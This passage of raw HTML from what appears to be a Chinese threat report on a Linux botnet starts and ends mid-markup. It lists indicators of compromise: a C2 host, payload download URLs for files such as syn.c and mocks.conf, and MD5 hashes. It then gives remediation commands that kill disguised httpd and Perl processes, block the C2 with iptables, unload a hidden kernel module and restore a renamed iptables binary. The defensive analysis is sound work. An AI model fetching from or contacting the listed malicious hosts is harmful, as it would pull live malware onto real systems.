style="text-align:right;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(175,175,175);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">9</span></span></p></td><td data-colwidth="794" width="794" valign="top" style="padding: 0pt 0pt 0pt 6pt;border-width: medium;border-style: none;border-color: currentcolor;background: rgb(255, 255, 255);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;text-align:left;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(0,0,0);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><font face="Consolas"><span leaf="">URL:</span></font></span></p><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;text-align:left;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(0,0,0);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">adam.established.site:80</span></span></p><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;text-align:left;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(0,0,0);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">andromeda.covers.de/221/mocks.conf</span></span></p><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;text-align:left;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(0,0,0);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">server.perpetual.pw/syn.c</span></span></p><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;text-align:left;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(0,0,0);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">server.perpetual.pw/50x.c</span></span></p><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;text-align:left;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(0,0,0);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf=""><a href="http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2." target="_blank">http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.</a></span></span><span style="font-family:Consolas;color:rgb(255,20,147);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">tar</span></span><span style="font-family:Consolas;color:rgb(0,0,0);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">.gz</span></span></p><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;text-align:left;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:宋体;mso-ascii-font-family:Consolas;mso-hansi-font-family:Consolas;mso-bidi-font-family:Consolas;color:rgb(51,51,51);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:1.0000pt;"><font face="Consolas"><span leaf="">MD5</span></font></span></p><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;text-align:left;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(0,0,0);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">05808c4722b06831246b821d1cbb800c</span></span></p><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;text-align:left;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(0,0,0);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">0320b2342100803a8546a2de877c6b3d</span></span></p><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;text-align:left;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(0,0,0);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">cbcd7afaaf22cb64d4f7f9a3c94c7c18</span></span></p></td></tr></tbody></table></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041925" src="https://wechat2rss.xlab.app/img-proxy/?k=f04ba969&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRmdPgJT70BB6oRyyhRII9u2T5wpPvb3Ipsy6J2ichfnrIcFFotIBqjGWcLEsibelYdYgOiclOgreCqqejLmKq1dvsibDf03FoW7CA%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="text-align: justify;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">建议处置流程</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时解决方案</span></span></strong></p><p style="margin-right: 0pt;margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 1. 终止 Bot 进程 (伪装为 httpd!)，！！！！需要先查看是为否正常httpd进程在</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><font face="var(--monospace)"><span leaf="">杀</span></font></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">ps</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> aux | </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">grep</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> httpd | </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">grep</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-v</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> apache | </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">grep</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-v</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> nginx | </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">awk</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#39;{print $2}&#39;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> | xargs </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">kill</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-9</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">ps</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> aux | </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">grep</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> perl | </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">grep</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> IO::Socket | </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">awk</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#39;{print $2}&#39;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> | xargs </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">kill</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-9</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(255,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><font face="var(--monospace)"><span leaf="">•</span></font></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 2. 阻止 C2 通信</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">iptables </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-A</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> OUTPUT </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-d</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> adam.established.site </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,204);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-j</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> DROP </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 防火墙阻断</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">echo</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,17,17);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">&#34;0.0.0.0 adam.established.site&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> &gt;&gt; /etc/hosts </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 将域名导向本地</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 3. 卸载模块,如果模块被隐藏, 需要重启到救援模式</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">rmmod cloud_monitor</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 验证</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">lsmod | </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">grep</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> cloud_monitor</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 4. 恢复 iptables</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">mv</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /usr/sbin/tokens /usr/sbin/iptables</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,0,170);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">mv</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> /sbin/tokens /sbin/iptables</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""># 重建防火墙规则</span></span><span 